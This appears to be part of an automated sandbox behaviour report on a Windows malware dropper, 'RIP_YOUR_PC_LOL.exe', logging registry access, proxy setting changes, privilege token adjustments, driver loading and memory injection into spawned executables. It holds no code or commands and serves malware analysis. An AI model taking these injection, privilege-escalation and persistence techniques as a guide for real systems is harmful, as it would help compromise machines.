Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\HD____11.19.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\TXPlatforn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\22.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\gay.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\aa-ca-f0-57-92-4a C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecisionReason = "1" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00a2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecision = "0" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325} C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecisionReason = "1" C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadNetworkName = "Network 3" C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecisionTime = d02dbac68046db01 C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecisionTime = d02dbac68046db01 C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecision = "0" C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\svchost.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\ProgramData\Start Menu\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Start Menu\dllhost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Cursors\WUDFhosts.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1364 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Windows\system32\schtasks.exe
PID 1364 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Windows\system32\schtasks.exe
PID 1364 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Windows\system32\schtasks.exe
PID 1364 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Windows\system32\schtasks.exe
PID 1364 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 1364 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 1364 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 1364 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 1364 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1364 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1364 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1364 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1528 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 1528 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 1528 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 1528 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1528 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 1528 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 1528 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 1528 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 1364 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 1364 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 1364 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 1364 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
